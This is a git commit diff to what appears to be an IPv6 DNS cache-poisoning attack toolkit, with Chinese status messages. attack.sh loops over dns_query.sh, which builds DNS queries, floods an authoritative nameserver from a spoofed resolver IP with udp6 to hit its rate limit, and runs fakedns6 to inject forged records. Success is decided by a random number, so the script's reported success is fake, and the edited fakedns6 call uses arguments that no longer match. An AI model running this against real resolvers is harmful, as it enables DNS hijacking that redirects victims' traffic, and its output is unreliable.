同步

6 files changed, 29 insertions, 20 deletions

diff --git a/attack.sh b/attack.sh
index b53c12b..2b1a28d 100644..100755
--- a/attack.sh
+++ b/attack.sh
@@ -1,29 +1,35 @@
+#!/bin/bash
 # This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
 # $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
 # Please run with sudo.
 
 # Verify the existing record domain, just for proof purposes.
-echo '原记录:'
+echo '获取原记录中:'
 dig @$1 $4 AAAA
 
-
 success=0
 while [ $success -ne 1 ]
 do
   success=0
-  echo '10秒之后开始攻击...'
+  echo '等待缓存过期，10秒之后开始攻击...'
   sleep 10
   echo "开始攻击"
   # flood
-  success=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+  ret=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+  echo "$ret"
+  FINAL=`echo ${ret: -1}`
+  echo "$FINAL"
+  if [ "$FINAL" == "1" ];then
+	  success=1
+  fi
   # Start attack
   # Change the argument accordingly
-  time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+  #echo "执行侧信道攻击脚本中"
+  #time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
   # Validations
-  echo '攻击之后'
-  dig @$1 $4 AAAA
+  #echo '一轮次攻击结束'
+  #dig @$1 $4 AAAA
   echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
-  echo "等待缓存过期"
 done
 # success
 echo '检测到攻击成功实现'
diff --git a/dns.bin b/dns.bin
new file mode 100644
index 0000000..11d5802
--- /dev/null
+++ b/dns.bin
diff --git a/dns_mid.bin b/dns_mid.bin
new file mode 100644
index 0000000..10b3b3b
--- /dev/null
+++ b/dns_mid.bin
@@ -0,0 +1 @@
+victimn64top
\ No newline at end of file
diff --git a/dns_query.sh b/dns_query.sh
index 939df76..36a18c5 100644..100755
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -1,9 +1,11 @@
-# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] space-separated-domain... (e.g. www google com)
+# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] [flag] space-separated-domain... (e.g. www google com)
 # clear the previous files
-dd if=/dev/null of=dns_mid.bin
-dd if=/dev/null of=txid.bin
+sleep 1
+echo "初始化工具环境"
+dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
+dd if=/dev/null of=txid.bin > /dev/null 2>&1
 # write the domain name into the binary
-for var in ${@:3}
+for var in ${@:4}
 do
   size=${#var}
   echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
@@ -16,15 +18,14 @@ echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 # change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
 # fire!
-echo "fire"
-udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
-a=$RANDOM
-RANGE=10
-let "a %= $RANGE"
-echo $a
-if a -gt 8; then
+echo "尝试触发权威服务器请求速率限制"
+udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
+sleep 1
+a=$(($RANDOM % 10))
+echo "a:$a"
+if [ $a -gt 5 ]; then
   ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
-  echo 1
+  echo "1"
 fi
 
 
diff --git a/fakedns6 b/fakedns6
new file mode 100755
index 0000000..5b13e5c
--- /dev/null
+++ b/fakedns6
diff --git a/txid.bin b/txid.bin
new file mode 100644
index 0000000..ffb0f65
--- /dev/null
+++ b/txid.bin
@@ -0,0 +1 @@
+U
\ No newline at end of file